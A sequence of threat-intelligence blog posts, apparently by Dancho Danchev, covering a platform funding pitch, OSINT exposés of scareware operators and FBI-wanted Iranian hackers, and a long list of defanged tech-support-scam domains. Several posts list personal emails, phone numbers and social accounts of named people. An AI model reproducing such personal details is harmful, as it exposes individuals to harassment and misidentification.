purchase of equipment related to secure work environment to ensure a smooth and secure work environment.

• Possible deliverables including Cisco Firepower ASA, CheckPoint Threat appliance, Nova network appliance,

Fortinet security appliance, Dell Soho network, security appliance.

The contractor Dancho Danchev is one of the world’s leading experts in the field of cybercrime research and threat

intelligence gathering having successfully tracked, monitored and profiled high-profile nation-state and malicious

actors type of fraudulent activity over the past decade having successfully pioneered and established a direct

connection with some of the world’s leading providers of threat intelligence gathering.

The contractor’s initial goal for the purpose of the Obmonix platform would be to achieve the world’s largest

and most comprehensive sensor type of network for monitoring, profiling and keeping track of nation-state

malicious-actors type of fraudulent and malicious activity.

The project main base would be located in a discreet location in Sofia, Bulgaria. The contractor would

eventually ensure that active RF shielding including basic physical security measures are in place, including active

surveillance, military-grade fence and an associated security guard, for the purpose of establishing the

foundation of a secure work environment.

The Obmonix platform aims to build the World’s most versatile and comprehensive sensor network for

intercepting, monitoring and responding to cybercrime and cyber jihad events, successfully deploying a variety of

proprietary sensor networks based on honeypot appliances, industry-wide partnership including the utilization of

proprietary cybercrime and cyber jihad forum and community monitoring and infiltration campaigns, successfully

positioning the platform as the leading indicator for cybercrime and cyber jihad activity globally.

Cost Proposal - Detailed Project Information

01. Equipment cost - The Obmonix platform will ultimately rely on the following equipment cost for the purpose of

establishing the foundations for the Obmonix platform.

• FortiMail

• FortiSandbox

• Blue Coat Malware Analysis

• Vormetric encryption appliance

• Checkpoint DDoS Protector

• Encryption appliance

• Cisco Catalyst

• Kapow appliance

• Appliance router

• Analytics appliance

• Infoblox Trinzic 1420

• Nova network security

• Cisco firewall appliance

• IllusionBlack Framework

• Rosette appliance

• Systran appliance

• NAS appliance

• pfSense

• Honeybox appliance

• Honeybox SCADA appliance

• Network equipment

Detailed Project Funding Phase Information

01. The initial funding phase will consist of active acquisition of assets for the purpose of obtaining access to industry

leading and proprietary selected providers of threat intelligence for the purpose of establishing the foundations for

an active sensors network type of cybercrime/cyber jihad monitor sensor network type of data. The initial stage

will consist of obtaining assets for the purpose of obtaining access to industry leading and proprietary selected

equipment for the purpose of setting the foundations for a successful sensor network based type of data.

• The initial phase will consist of active purchase of the following equipment: FortiSandbox, Blue Coat Malware

Analysis, NAS Storage, Cisco Firewall, PfSense, Cisco Catalyst, Vormetric encryption appliance, including the

following subscription-based type of threat intelligence gathering data - Team Cymru threat data feed, Kaspersky

threat data feed, Abusix threat data feed, MalwarePatrol threat data feed, Sophos threat data feed, OPSWAT,

Abusix Threat Feed, ProjectHoneypot threat data feed.

Including the following Threat Feeds:

• Kaspersky Data Feed

• Sophos Data Feed

• Jigsaw Threat Data Feed

• IBM X-Force Exchange

• Team Cymru Data Feed

• Proofpoint Threat Feed

• NetSTAR Data Feed

• RiskIQ Data Feed

• ESET Data Feed

• Pixalate Data Feed

• MalwarePatrol Data Feed

• Abusix Data Feed

• Massive Data Feed

• PhishLabs Data Feed

• LookingGlass Data Feed

• Blueliv Data Feed

• Mnemonic Data Feed

• Cyren Data Feed

• ADMINUSLabs Data Feed

• NSFOCUS Data Feed

• Webroot Data Feed

• Symantec Data Feed

• VirusTotal Data Feed

• ProjectHoneypot Data Feed

02. The second funding phase will consist of active acquisition of honeypot appliances, including active netblock purchases within a dedicated set of countries, for the purpose of establishing the foundations of the active sensor network's data-acquisition activities.

• The second funding phase will consist of active acquisition of the following proprietary appliances: Honeybox Enterprise, Infoblox Trinzic 1420, Honeybox SCADA, including netblocks within a dedicated set of countries: Algeria, Argentina, Bahrain, Bolivia, Brazil, Burkina Faso, Chile, China, Colombia, Cyprus, Ecuador, Guatemala, Jordan, Democratic People’s Republic of Korea, Liberia, Macao, Maldives, Moldova, Republic of Nauru, Niger, Pakistan, Poland, Romania, Sierra Leone, Sudan, Syrian Arab Republic, Togo, Uganda, Vanuatu, Yemen.

03. The third funding phase will consist of active purchase of service- and solution-based appliances, including data-processing and localization appliances, for the purpose of setting up the foundations for the Obmonix platform, empowering its operator with the necessary data and expertise to actively respond to global cybercrime and jihad events.

• The third funding phase will consist of active purchase of the following appliances: Kapow Software, Rosette appliance, Systran appliance, Sentinel appliance, Palantir appliance.

In case you’re interested in working with me for the purpose of implementing this project including possible investor

introduction - I can be reached at dancho.danchev@hush.com

1. http://www.dia.mil/Business/Needipedia/

2. https://www.srf.org/
Who’s Behind BakaSoftware? - OSINT Analysis (2019-01-15 18:32)

Remember [1]BakaSoftware? The ubiquitous scareware-serving and distributing, money-laundering, affiliate-based network circa 2008? It appears that the time has come to expose the actual individuals behind the campaign and the actual network.

In this analysis I’ll discuss in depth the BakaSoftware franchise circa 2008, including in-depth and personally identifiable information on the cybercriminals behind it, with the idea to empower law enforcement and the security industry with the necessary data and information that would eventually lead to the tracking down and prosecution of the cybercriminals behind BakaSoftware.

I can be reached at dancho.danchev@hush.com


Personally Identifiable Information regarding BakaSoftware’s Founder and CEO - Gavril Danilkin:

Name: Gavril Danilkin

Email: gavril@penza.net; fido@penza.net; doncapone@mail.ru; gavril@sura.com.ru;

Mobile Phone: 8412631806; 89023537746; 841251-06-02; 841256-49-45; 841276-06-93

Skype: BakaDialer

Web Site: http://penza-stroika.narod.ru

Malicious and Fraudulent Infrastructure reconnaissance:

hxxp://bakasoftware.com - 216.240.138.200 - Email: gavril@penza.net

hxxp://ns1.bakasoftware.com - 216.255.189.139 Email: support@tobesoftware.com

hxxp://tst.bakasoftware.com - 216.255.189.155 - Email: support@tobesoftware.com

hxxp://bakasoftware.net - 208.88.227.36; 208.88.227.36 - Email: krab@thekrab.com

hxxp://bakadialer.com

Personally Identifiable Information regarding BakaSoftware - TheKrab:

Name: TheKrab

Email: marck@gmail.com

Phone: +7 012-225-5252

Web site: http://smmprofi.ru/marck

It gets even more interesting to find out that BakaSoftware’s Gavril Danilkin is currently running a rogue and potentially malicious rogueware- and adware-distributing affiliate company known as Zaxar Limited. Let’s take the time and effort to provide actionable intelligence on the infrastructure behind the campaign.

Related Zaxar Ltd Information:

Zaxar Limited

P.O. Box 54922,

Zip 3729,

Limassol, Cyprus

e-mail: secretary@zaxar.net

Related malicious URLs known to have participated in the campaign:

hxxp://zxrmedia.com/client/current_version6/cef_extensions.pak

hxxp://zxrmedia.com/client/current_version6/gameslist.dat

hxxp://zxrmedia.com/client/current_version6/calling.wav

hxxp://zxrmedia.com/client/current_version6/cef_100_percent.pak

hxxp://zxrmedia.com/client/current_version6/devtools_resources.pak

hxxp://zxrmedia.com/client/current_version6/cef.pak.info

Fraudulent and malicious rogue network infrastructure reconnaissance:

hxxp://zaxargames.com - 185.82.210.27; 185.82.210.24; 185.82.210.30

hxxp://zxrmedia.com - 185.82.210.5; 185.82.210.26; 188.42.129.36; 185.82.210.29

hxxp://zaxarstore.com - 185.82.210.24

hxxp://zaxargames.com

hxxp://zaxarsearch.com

Related malicious MD5s known to have participated in the campaign:


Related domains known to have participated in the campaign:


Stay tuned!

1. https://www.secureworks.com/research/rogue-antivirus-part-2
Exposing Iran’s Most Wanted Cybercriminals - FBI Most Wanted Checklist - OSINT Analysis (2019-01-16 11:09)

Remember my most recently published "[1]Assessing The Computer Network Operation (CNO) Capabilities of the Islamic Republic of Iran - Report"? The report details and discusses in depth the most prolific Iran-based government-sponsored and tolerated hacking groups, including the following groups:

- Ashiyane Digital Security Team

- Iranhack Security Team

- Iranian Datacoders Security Team

- Iran Security Team a.k.a SEPANTA Team/Iran Cyber Army 2012/2013

- IDH Security Team

- Bastan Security Team

- NOPO Digital Security Team

- Shekaf Security Team

- Mafia Hacking Team

- Iran Black Hats Team

- Delta Hacking Security Team

- Digital Boys Underground Team

- IrIst Security Team

I recently came across the [2]FBI’s Most Wanted Cybercriminals List and decided to elaborate more by providing actionable Threat Intelligence on some of the most Wanted Iranian cybercriminals, with the idea to help law enforcement, to inform the security industry, and to ensure that the cybercriminals behind these campaigns can be properly tracked down and prosecuted.

I can be reached at dancho.danchev@hush.com

In this OSINT analysis I’ll provide actionable intelligence, including personally identifiable information, on some of FBI’s Most Wanted Iranian cybercriminals, including [3]Ahmad Fathi, [4]Hamid Firoozi, [5]Amin Shokohi, [6]Mohammad Sadegh Ahmadzadegan, [7]Omid Ghaffarinia, [8]Sina Keissar, [9]Nader Saedi, as well as the infamous ITSec Team and the Mersad Co. company.
Personally Identifiable Information regarding Sun Army Team Members including ITSec Team and the Mersad Co. company:

Sun Army Team Members:

Nitrojen26, Mehdy007, MagicCoder, tHe.Mo3tafA, Plus, BodyGuard

Sample Network Infrastructure Reconnaissance:

hxxp://sun-army.org - 185.53.179.10 - Email: Sun.Army@asia.com; Lord.private@ymail.com

Name: Omid Ghaffarinia

Handle: Plus

Email: omid.ghaffarinia@gmail.com; plus.ashiyane@gmail.com; omid.ghaffarinia@alum.sharif.edu

Phone: 091 2444 9002

Web Site: http://alum.sharif.ir/omid.ghaffarinia/; http://omidplus.persiangig.com/;

Social Media Accounts: https://plus.google.com/109226633947780718251

Handle: MagicCoder

Email: MagicC0d3r@gmail.com

Web Site: http://magiccoder.ir

Handle: Mehdy007

Email: mehdy007@hotmail.fr

Web Site: http://mehdy007.persiangig.com

ITSec Team a.k.a Amn pardazesh kharazmi a.k.a Pooya Digital Security Group Members:

Pejvak, M3hr@n.S, Am!rkh@n, Doosib, H4mid@Tm3l, R3dm0ve, Provider, ahmadbady
Sample Team Member Personally Identifiable Information:

Name: Amin Shokohi

Handle: Pejvak

Email: pejv4k@yahoo.com

Web Site: http://pejv4k.persiangig.com; http://pejv4k.110mb.com

Handle: Mehr@n.S

Email: M3hran.S@gmail.com

Sample Network Infrastructure Reconnaissance:

http://itsecteam.com/

Name: Mohammad Sadegh Ahmadzadegan

Handle: Nitrojen26

Email: nitr0jen26@asia.com; Nitrojen26@yahoo.com; me@sadahm.net

Web Site: hxxp://sadahm.com

Social Media Accounts: https://twitter.com/nitrojen26

Sample Network Infrastructure reconnaissance:

hxxp://mersad.co/ - 188.40.112.196

hxxp://mersadco.ir

Mohammad’s life has strongly tied with programming. After graduation of Computer Engineering, he studied IT

(E-Commerce) for his Master to know more about the relation of business and technology. You can find some large

scale software projects managed by him like Iran’s SOC, SDIDS, Jolfa Vulnerability DB and etc. Now he is a university

lecturer and also CEO of Mersad Co. and one of TKJ Co. consultants. Mohammad is here to help you how to manage

a good develop team and guide you to have better usage of technology to achieve your business goals.

Personally Identifiable Information regarding Mersad Co. Company CEO Mohammad Hamidi Esfahani:

Name: Mohammad Hamidi Esfahani

Email: m.hamidi.es@gmail.com

Phone: 0913-304-7591

Web Sites: http://www.mohammadhamidi.ir/
Social Media Accounts: https://www.facebook.com/mohammad.hamidi; https://twitter.com/haj_mamed; https://github.com/mohammadhamidi; https://medium.com/@haj_mamed; https://plus.google.com/+mohammadhamidiEsfahani;

Stay tuned!

1. https://ddanchev.blogspot.com/2015/07/assessing-computer-network-operation_29.html

2. https://www.fbi.gov/wanted/cyber

3. https://www.fbi.gov/wanted/cyber/ahmad-fathi

4. https://www.fbi.gov/wanted/cyber/hamid-firoozi

5. https://www.fbi.gov/wanted/cyber/amin-shokohi

6. https://www.fbi.gov/wanted/cyber/mohammad-sadegh-ahmadzadegan
7. https://www.fbi.gov/wanted/cyber/omid-ghaffarinia

8. https://www.fbi.gov/wanted/cyber/sina-keissar

9. https://www.fbi.gov/wanted/cyber/nader-saedi
Historical OSINT - A Portfolio of Fake Tech Support Scam Domains - An Analysis (2019-01-16 16:03)

The Rise of Tech Support Scams? You wish.

The general availability of Tech Support Scams can be attributed to an overall increase in the standardization of social-engineering-driven fraudulent and rogue scams, which in turn can be largely attributed to the overall availability of affiliate-network-based fraudulent revenue-sharing schemes.

Keep reading.

Today’s modern Tech Support Scam can be best described as a logical copycat evolution of the well-known Scareware, also known as Fake Security Software, a fraudulent and malicious monetization scheme largely affecting millions of users globally thanks to the overall availability of affiliate-network-based revenue-sharing schemes.

The key distribution and propagation tactics include spam and phishing campaigns, instant messaging and black hat SEO, largely relying on traffic acquisition on a volume basis for the purpose of converting the traffic into potential fraudulent customers and victims.

Taking into consideration that the key traffic acquisition tactics remain the primary growth factor of the Tech Support Scam market segment, the key business model and "talent acquisition" tactics remain the active outsourcing to custom-labeled call centers and data mining operators, including the active utilization of brand-jacking, possible typosquatting-based campaigns and active visual social engineering campaigns.

Are Tech Support Scams making a come-back? How can we best proceed to estimate the true cost and associated actionable threat intelligence courtesy of Tech Support Scams? Keep reading!

In this Intelligence brief I’ll provide actionable intelligence on a diverse portfolio of Fake Tech Support scam domains and discuss in depth the tactics, techniques and procedures of the cybercriminals behind it, with the idea to successfully disrupt and shut down the rogue operations related to this particular Intelligence brief.

Sample portfolio of fake and fraudulent Tech-Support Scam phone numbers:


Sample portfolio of Fake Tech Support Scam Domains:


hxxp://antivirus-help.org

hxxp://antivirus-helpline-number.org

hxxp://antivirus-helpnumber.com

hxxp://antivirus-hub.net

hxxp://antivirus-number.com

hxxp://antivirus-support-number.com

hxxp://antivirus-support-number.net

hxxp://antivirus-support-number.online

hxxp://antivirus-support-number.org

hxxp://antivirus-support.net

hxxp://antivirus-supportnumber.com

hxxp://antivirus-technical-support.com

hxxp://antivirus-technicalsupport.com

hxxp://antivirusconsulting.com

hxxp://antiviruscontactnumber.co.uk

hxxp://antiviruscure.us

hxxp://antiviruscustomerservices.com

hxxp://antivirusdaddy.com

hxxp://antiviruserror.com

hxxp://antivirushelpdesk.in

hxxp://antivirushelpdesknumber.co.uk

hxxp://antivirushelpnumber.co.uk

hxxp://antivirusinfotech.us

hxxp://antivirusinstallation.co.uk

hxxp://antivirusnumber.com

hxxp://antivirusphonenumber.co.uk
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hxxp://antivirussecurities.com

hxxp://antivirussetuphelp.com

hxxp://antivirussuport.com

hxxp://antivirussupport-au.puzl.com

hxxp://antivirussupport.ca

hxxp://antivirussupportaustralia.com

hxxp://antivirussupportaustralia.com.au

hxxp://antivirussupportcanada.ca

hxxp://antivirussupporthelpdesk.com

hxxp://antivirussupporthelpline.com

hxxp://antivirussupportnumber.us

hxxp://antivirussupportnumberca.ca

hxxp://antivirussupportnumberca.com

hxxp://antivirussupportnumberusa.com

hxxp://antivirussupportphonenumber.co.uk

hxxp://antivirussupports.net

hxxp://antivirustechhelp.com

hxxp://antivirustechnicalhelp.com

hxxp://antivirustechnicalservice.com

hxxp://antivirustechsupport.com

hxxp://antivirustechsupportnumber.com

hxxp://antivirusupportnumber.com

hxxp://anvsupport.com

hxxp://aol-online-support.com

hxxp://aolcustomercare.xyz

hxxp://aolcustomercarecontactnumber.xyz

hxxp://aolcustomercarenumber.xyz

hxxp://aolcustomerservice.co

hxxp://aolcustomerservice.net

hxxp://aolcustomersupport.page.tl

hxxp://aoldesktopgold.quora.com

hxxp://aolemailpasswordforget.xyz

hxxp://aolemailpasswordrecovery.xyz

hxxp://aolemailsupport.xyz

hxxp://aolemailsupportcontactnumber.xyz

hxxp://aolemailtechnicalsupportnumber.xyz

hxxp://aolgoldsupport.com

hxxp://aolmailsupports.com

hxxp://aolsupport.email

hxxp://aolsupport.xyz

hxxp://aoltechnicalhelp.com

hxxp://aoltechnicalsupport.xyz

hxxp://aoltechnicalsupportcontactnumber.xyz

hxxp://aoltechsupportnumber.com

hxxp://apexseo.online

hxxp://apextm.com

hxxp://apple-24hour-support.org

hxxp://apple-800-number.org
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hxxp://apple-anti-virus.org
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hxxp://webgeekx.com

hxxp://webguru.site

hxxp://webhelpcenter24x7.com

hxxp://webhubunisol.com

hxxp://webinnovator.net

hxxp://webmail-login.online

hxxp://webmailhelps.com

hxxp://webmakerlink.com

hxxp://webnetworksolutions.com

hxxp://webninza.com

hxxp://webpcsfix.com

hxxp://webroot-com-safe.us

hxxp://webroot-install.com

hxxp://webroot-phone-number.com

hxxp://webroot.klantenservicenummernederland.com

hxxp://webroot.support

hxxp://webroot.technicalhelpdesknumber.com

hxxp://webrootcomsafe.services

hxxp://webrootcustomerservice.com

hxxp://webrootofficial.com

hxxp://webrootsupportphone.com

hxxp://webroottechsupport.com

hxxp://webserviceassist.online

hxxp://webservicehelp.website

hxxp://websoftdesk.com

hxxp://webxsolution.co.uk
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hxxp://weguardcomputers.com

hxxp://wemotechsupport.com

hxxp://wesupportsolutions.com

hxxp://wgmkr.xyz

hxxp://whatsapp-support-us.com

hxxp://wiebisdeinstallieren.com

hxxp://wiemanmalwaredeinstallieren.org

hxxp://wieumentfernenvirus.com

hxxp://wikihelpco.wordpress.com

hxxp://win-secure-online-assistance-error.info

hxxp://winbytes.org

hxxp://winchatsupport.com

hxxp://window8-free-help-customer-service-call-1877-581-8998.site

hxxp://window-download-faliure-support-ppit6990.com

hxxp://window-sup.blogspot.com

hxxp://window-support.co.uk

hxxp://windownotification.com

hxxp://windows10customerservice.com

hxxp://windows10help.support

hxxp://windows10helpdesk.com

hxxp://windows10problems.org

hxxp://windows10supportcenter.com

hxxp://windows10supportpage.com

hxxp://windows10supportphonenumber.com

hxxp://windows10techsupportphonenumber.com

hxxp://windows-8.technicalsupportservicesinc.com

hxxp://windows-10.technicalsupportservicesinc.com

hxxp://windows-10support.com

hxxp://windows–alert.online

hxxp://windows–alerts.online

hxxp://windows-blue-screen-crash.xyz

hxxp://windows-bug.site

hxxp://windows-corrupted-browser-not-secure-call-support.info

hxxp://windows-error.co

hxxp://windows-errorx.com

hxxp://windows-firewall-security-alert-error-found5.info

hxxp://windows-has-detected-some-suspicious-activity-from-your-ipqw.in

hxxp://windows-has-detected-some-suspicious-activity-fromyourcomputer.com
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hxxp://windows-helplines.com

hxxp://windows-kernal-warning-error-found-diskread-error.com

hxxp://windows-security-alert-malware-found-call-support.info

hxxp://windows-security-alert-system-not-safe-call-support.info

hxxp://windows-security-alert-system-not-safe-plese-call-support.info

hxxp://windows-security-alert-virus-found-call-support.info

hxxp://windows-security-center-2236.info

hxxp://windows-server-error.info

hxxp://windows-server-warning.info

hxxp://windows-server-warning.us

hxxp://windows-support-me.com

hxxp://windows-support.windowshelp.support

hxxp://windows-system-587632.us

hxxp://windows-system-alert.info

hxxp://windows-system-error.us

hxxp://windows-technical-support.com

hxxp://windows-techsupport.com

hxxp://windows-threat.com

hxxp://windows-virus-alert-risk.online

hxxp://windows-warning-error-found.com

hxxp://windows.technical-care.com

hxxp://windowsalerts.xyz

hxxp://windowscanpage.online

hxxp://windowscanpage.website

hxxp://windowsecuritycounsel.online

hxxp://windowserrorhelps.com

hxxp://windowserrorsalert.com

hxxp://windowshelp.support

hxxp://windowsisnotgenuine.com

hxxp://windowslivemailcustomerservice.com

hxxp://windowslivemailsupport.net

hxxp://windowslivetechsupport.com

hxxp://windowsmicrosofts.xyz

408

hxxp://windowssecurity-center-2999.info

hxxp://windowsserver102082308328.xyz

hxxp://windowssupportnumbers.com

hxxp://windowssupportphonenumber.com

hxxp://windowstechnicalsupportnumbers.com

hxxp://windowstechsupportphonenumber.com

hxxp://windowsupport.ulcraft.com

hxxp://windowsupportaustralia.xyz

hxxp://windowsupporthelp247.com

hxxp://windowsvirusnotification.com

hxxp://windstream.supportno.com

hxxp://windsupportcare10.xyz

hxxp://winprotechnologies.com

hxxp://winsec.biz

hxxp://winsurftechnology.com

hxxp://wintechassist.com

hxxp://wizxpert.com

hxxp://wordfiction11.info

hxxp://worldwebhelper.com

hxxp://worldwidewebb.in

hxxp://wormsupport1.info

hxxp://wormsupport2.info

hxxp://wormsupport3.info

hxxp://wormsupport4.info

hxxp://wormsupport5.info

hxxp://wormsupport.info

hxxp://wormsupports.info

hxxp://wqeasfas.xyz

hxxp://wruxqo-atixin.xyz

hxxp://www-mcafee-com-activate.com

hxxp://www-norton-com-setup.com

hxxp://www-support.net

hxxp://wwwhelpnumber.co.uk

hxxp://wwwmcafeeactivate.com

hxxp://wwwmcafeecomactivate.co

hxxp://wwwoasisinfosolutionin.000webhostapp.com
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hxxp://wwwofficecomsetup.co

hxxp://wwwofficecomsetup.net

hxxp://wwwofficecomsetup.xyz

hxxp://x62y.com/8n9jd/index.php

hxxp://xboxhelpline.com

hxxp://xboxportforwarding.com

hxxp://xdebugging.club

hxxp://xerox.printersupportaustralia.com

hxxp://xerox.printersupportca.com

hxxp://xerox.printersupportnumbercanada.ca

hxxp://xientsupport.com

hxxp://xurnya-zlysifu.xyz

hxxp://yahoo-customer-care.co.uk

hxxp://yahoo-customer-service.org

hxxp://yahoo-customer-service.us

hxxp://yahoo-service-number.com

hxxp://yahoo-supports.com

hxxp://yahoo-yahoomail.com

hxxp://yahoo.australiaemailsupport.com

hxxp://yahoo.klantenservicenederland.nl

hxxp://yahoo.numberireland.com

hxxp://yahoo.supportau.com.au

hxxp://yahoo.supportaustralia.com.au

hxxp://yahoo.supportnumberaustralia.com.au

hxxp://yahoo.technicalsupportcontact.net

hxxp://yahoocontact.weebly.com

hxxp://yahoocontactnumber.co.uk

hxxp://yahoocustomercare.us

hxxp://yahoocustomerservice.co.uk

hxxp://yahoocustomerservice.org

hxxp://yahoocustomerservicephonenumber.us

hxxp://yahoocustomerservices.net

hxxp://yahooservice.online

hxxp://yahoosupporstaustralia.blogszino.com

hxxp://yahoosupport.blogszino.com
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hxxp://yahoosupport.customerhelpusa.com

hxxp://yahoosupportau.skyrock.com

hxxp://yahoosupportaustralia.com.au

hxxp://yahoosupportcenter.com

hxxp://yahoosupporthelp.com

hxxp://yahoosupportnumber.com.au

hxxp://yahoosupportnumberau.wordpress.com

hxxp://yahoosupporttech.com

hxxp://yahootechsupport.site.pro

hxxp://ydeveloper.com

hxxp://yippeetech.co.uk

hxxp://ymailcustomerservice.com

hxxp://yournetworkreports.xyz

hxxp://yourpcassistant.com

hxxp://yourtechbay.com

hxxp://youtubemail.info

hxxp://youworldtrips.online

hxxp://ysence.com

hxxp://ysupportnumber.com

hxxp://z2s-microsoft.info

hxxp://zakazeniepoprawa.com

hxxp://zeus-virus-caused-system-corruption-contact.info

hxxp://zeusalert-1.xyz

hxxp://zeusalert-2.xyz

hxxp://zeusalert-3.xyz

hxxp://zeusalert-4.xyz

hxxp://zeusalert-5.xyz

hxxp://zeusalert-6.xyz

hxxp://zeusalert-7.xyz

hxxp://zeusalert-9.xyz

hxxp://zeusalert-10.xyz

hxxp://zeusalert-11.xyz

hxxp://zeusalert-12.xyz

hxxp://zeusalert-13.xyz

hxxp://zeusalert-14.xyz

hxxp://zeusalert-15.xyz

hxxp://zeuswin21147.in

hxxp://znetworks.net

hxxp://zonealarmantivirussupport.com

hxxp://zumbalamsada.xyz

hxxp://zyngahelp.com

Stay tuned for the updated portfolio of Fake Tech Support Scams to be published anytime soon!

The Threat Intelligence Market Segment - A Complete Mockery and IP Theft Compromise - An Open Letter to the U.S Intelligence Community (2019-01-24 19:25)

I recently came across the most recently published [1]DoD Cyberspace Strategy 2018, which greatly reminded me of a variety of resources that I recently took a look at in terms of catching up with some of the latest cyber warfare trends and scenarios. Do you want to be a cyber warrior? Do you want to "hunt down the bad guys"? Watch out - Uncle Sam is there to spank the very bottom of your digital irrelevance. How come?

It appears that the U.S is reclaiming dominance over the "communication channel" using a variety of real-life oriented cyber threats including referencing and citing security researchers and NGOs (Non-Profit Organizations) as potential threats. Takes you back - doesn’t it? If it’s going to be massive it better be good.

It’s been several years since I last posted a quality update following my [2]disappearance and possible kidnapping attempt circa 2010. What really took place during that period of time? The rise of ransomware? The rise of Tech Support Scams? Yet another botnet currently spreading In The Wild? A market-driven buzz-word generation?

Take that - ransomware is there to take care, hundreds of thousands of supposedly relevant IOCs (Indicators of Compromise) and TTPs (Tactics, Techniques and Procedures) discussed to the bottom of your PR-relevant online presence. The Rise of the Threat Hunter job career opportunity basically empowering you with the almighty skills to "track down" and "shut down" the bad guys? You wish - Uncle Sam is always there to take care.

Let’s discuss the Threat Intelligence market segment and offer an in-depth discussion on its inner workings including a possible discussion on the Threat Intelligence market segment in today’s modern Intelligence Community successfully realizing the consequences of what was once a proprietary network known as the Internet - today’s modern cyber warfare operational battlefield.

Many of my blog readers are familiar with my work throughout the years; however, what you might not be aware of is the fact that throughout the 90’s I used to pioneer the position of Technical Collector in the context of processing hundreds of malicious and user-friendly Trojan Horses also known as Remote Backdoors, which would later be described as Remote Access Tools, through my hacker enthusiast years as an independent contractor and novice hacker working with the market-leading LockDownCorp anti-trojan horse software, leading to what would later be better described as the foundations of the Threat Intelligence market’s qualitative Technical Collection, including the very basics of the foundations of CYBERINT.

Let’s discuss in-depth the current state of the Threat Intelligence market segment including an in-depth discussion on the Threat Intelligence market segment in the context of today’s modern U.S Intelligence Community.

• Indicators of Compromise - the very basics of formulating a new buzz-word for what was once a proprietary term coined by the Intelligence Community to populate and disseminate actionable nation-state Cyberspace data to a variety of defensive and offensive Cyber Warfare Units can be best described as a New Age in the area of responsive and proactive OSINT type of acquisition methodologies that can be best described as a new way to acquire leaked and potentially data-and-resource exposure in a variety of automated ways. Generalizing the very basics of the Threat Intelligence market segment in the context of potential Indicators of Compromise leaks can be best tackled in a way of offering central repositories including "government-free" access including a nation-state Early Warning System for potential Cyberspace threat data including a variety of Indicators of Compromise to prevent wide-spread data and information leaks further protecting the U.S Government from current and emerging threats.

• Corporate Sector Data Mining Should Be Considered - what was once best known as "conducting cyber espionage through botnets" including the conducting of "cyber espionage through data mining of malware-infected corporate networks" can be best described as today’s proposed central Incident Response based central-repository empowering the U.S Intelligence Community with the necessary data and expertise to stay ahead and act upon current and emerging cyber threats.

• Private Sector Cooperation and the "You Wish" mentality - the general assumption that the private sector will continue to cooperate and empower the U.S Intelligence Community with the necessary data, information and knowledge should be considered a wrong approach on the U.S Intelligence Community’s way to further protect the U.S national infrastructure including the proactive response to current and emerging cyber threats. What can be best done to further protect the U.S Government from current and emerging threats can be best described as a modern central-repository of "government-free" access based Cyber Threat Data type of platform.

• Slicing the Threat on Pieces Should be Ignored - What can be best described as the process of slicing the threat "on pieces" is today’s modern World of PR agencies and Threat Intelligence market segment intermediaries including the active labeling of a particular group of interest or an individual as a separate entry leading to an overall confusion in the context of actually providing actionable Threat Intelligence to the U.S Intelligence Community that could ultimately better protect the U.S National Infrastructure. With the mainstream media continuing to raise the buzz around popular terms and newly coined cyber threat actor groups in the face of the rise of the advanced persistent threat media-buzz generating initiative it should be clearly noted that labeling a specific cyber threat actor in the public domain should be considered an irrelevant exercise in the broad context of providing the U.S Intelligence Community with the necessary data, information and knowledge to stay ahead of current and emerging cyber threats.

• Tactics Techniques and Procedures Should Be Buzz-Word Ignored - The very basics of coining a term for the purpose of describing what can be best described as a general cyber threat methodology known as qualitative assessment should be considered as a possible flag raising operation and a possible source of confusion in terms of the broader context of discussing and reacting to current and emerging cyber threats.

• The Rise of the "Threat Hunter" Cyber Security Career Position Is Already Causing Headaches - The rise of the "Threat Hunter" career position can be best described as a complete failure to understand the basics that drive today’s modern Cyber Warfare Team including possible defensive and offensive Cyber Warfare Units and Cyber Operations Groups. With everyone "interested" in becoming a Cyber Warrior including a possible "Threat Hunter" it should be noted that the over-supply of private-sector companies stealing revenue from Uncle Sam for the purpose of enriching and disseminating actionable Threat Intelligence is overly increasing resulting in the overall demise of what was once a proprietary technology and know-how in the hands of a few that truly grasped the market and its potential successfully serving the needs of the U.S government for years to come.

• The Rise of Secondary Markets for IOCs Should Provide "Government-free" Access - The general over-supply of market-segment driven repositories of actionable Threat Intelligence data should be greatly attributed to a variety of factors including the rise of the Threat Intelligence market segment and should be considered as a way for the U.S Intelligence Community to clearly seek a technical and potentially market-segment relevant way to populate a potential Cyber Threats data-base using public and proprietary sources with a clear "government-free" access in mind.

Current Proposals to U.S Intelligence Community in Terms of Threat Intelligence and Nation-State Actors:

• Clustered Activity - Taking into consideration the fact that on the majority of occasions quality Threat Intelligence type of data is publicly obtainable using a variety of public and potentially proprietary sources, it should be considered feasible for the U.S Intelligence community to build, manage and operate a proactive-based Cyber Threats anticipating platform including a possible Early Warning Based type of OSINT-capable system able to anticipate and act upon current and emerging threats with a possible cluster-based type of data mining and information processing capabilities potentially serving the needs of the U.S Intelligence Community.

• Government-free Access - The very notion that an Indian-based company will successfully manage, launch and operate a Threat Intelligence business should be largely ignored for the very sake of figuring out a way to obtain access to a particular company’s Threat Intelligence data, information and knowledge citing potential National Security issues. What should be considered in terms of obtaining access to a company’s data-base citing potential National Security issues is the so called notion of "government-free" access based type of private sector partnership.

• Talent Acquisition Roles - In today’s modern Talent Acquisition Wars it should be clearly noted that a select set of key individuals can greatly contribute to the overall demise of cybercrime internationally taking into consideration the overall demise of the "Wisdom of the Crowds" market-segment driven-concept. What should be considered when hiring a potential top-notch Cyber Warfare and Information Warfare-based type of personnel shouldn’t necessarily be years and decades worth of experience but the overall disruptive degree of the individual in terms of "making a change" and "making an impact" compared to a certification-based-driven crowd of individuals.

• Central Repository - What the modern U.S Intelligence Community can do to better protect the nation’s Infrastructure should be considered as something along the lines of a central-private-sector driven repository of Threat Intelligence type of data including the notion of a "government-free" access in terms of obtaining access to a public or a proprietary company information and data assets.

1. https://fas.org/irp/doddir/dod/jp3_12.pdf

2. https://ddanchev.blogspot.com/2018/10/dancho-danchevs-2010-disappearance.html

Historical OSINT - Re-Shipping Money Mule Recruitment "Your Shipping Panel LLC" Scam Domain Portfolio Spotted in the Wild (2019-02-07 10:14)

The time has come to profile a recently intercepted and currently active malicious and fraudulent re-shipping money mule recruitment campaign successfully enticing users into interacting with the rogue and bogus content, potentially forwarding the risk of the fraudulent transaction to the unsuspecting user.

Sample malicious URL:

hxxp://yourshippingpanel.com

Sample Mailing Address:

One World Trade Center, New York, NY, 10007, USA

+1 (606) 879-0046

Sample Company Description:

